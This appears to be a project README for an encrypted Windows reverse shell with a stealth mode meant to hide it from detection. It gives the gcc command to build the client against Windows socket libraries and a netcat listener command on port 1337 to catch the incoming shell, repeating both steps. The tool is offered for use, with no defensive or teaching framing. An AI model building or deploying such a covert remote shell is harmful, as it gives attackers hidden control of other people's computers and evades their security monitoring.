This project provides a simple encrypted reverse shell for Windows, which also has the capability to hide itself.
- Compile the reverse shell code using GCC:
gcc rev.c -lwsock32 -lws2_32 -static-libgcc -o rev
- Start a listener to receive the incoming connections. You can use
netcat
or any other listener:nc -l 1337
- Encryption: Ensures that the communication between the client and server is encrypted for added security.
- Stealth Mode: The reverse shell hides itself to avoid detection.
- GCC: Make sure you have GCC installed on your system to compile the code.
- Netcat (nc): A versatile networking tool used for creating the listener.
-
Compile the Client Code:
gcc rev.c -lwsock32 -lws2_32 -static-libgcc -o rev
This command links the necessary Windows socket libraries and outputs an executable named
rev
. -
Run the Listener:
nc -l 1337
This command starts a netcat listener on port
1337
to wait for incoming connections from the reverse shell.
- Developed by Vincent Ng